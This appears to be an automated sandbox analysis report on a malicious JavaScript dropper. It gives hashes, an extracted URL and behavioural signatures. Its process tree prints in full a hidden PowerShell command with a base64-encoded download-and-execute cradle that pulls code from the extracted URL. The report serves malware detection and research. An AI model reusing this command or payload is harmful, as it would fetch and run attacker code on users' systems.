Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
07/01/2024, 19:21
Static task
static1
Behavioral task
behavioral1
Sample
a6bcd682ec15292a0a8e3f841ae2bda5.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a6bcd682ec15292a0a8e3f841ae2bda5.js
Resource
win10v2004-20231215-en
General
-
Target
a6bcd682ec15292a0a8e3f841ae2bda5.js
-
Size
86KB
-
MD5
a6bcd682ec15292a0a8e3f841ae2bda5
-
SHA1
7f88854a04b4e35a693f7ca2fd1683672d5a829f
-
SHA256
961b51cea408027213e56293d99a3bf7778bf95346eeca5cdf7c6f8d7a1f933f
-
SHA512
4dd1a22a0aae362d606841ef67bf216234e241d080ef50bc25c21e47b8826f55750ae19971d04682f0096d17e513532c3b43016632df585d4e58fe149a3bea1e
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oR:59Ry98guHVBqqg2bcruzUHmLKeMMU7GH
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2352 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2352 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1396 wrote to memory of 2860 1396 wscript.exe 30 PID 1396 wrote to memory of 2860 1396 wscript.exe 30 PID 1396 wrote to memory of 2860 1396 wscript.exe 30 PID 2860 wrote to memory of 2352 2860 cmd.exe 28 PID 2860 wrote to memory of 2352 2860 cmd.exe 28 PID 2860 wrote to memory of 2352 2860 cmd.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a6bcd682ec15292a0a8e3f841ae2bda5.js1⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352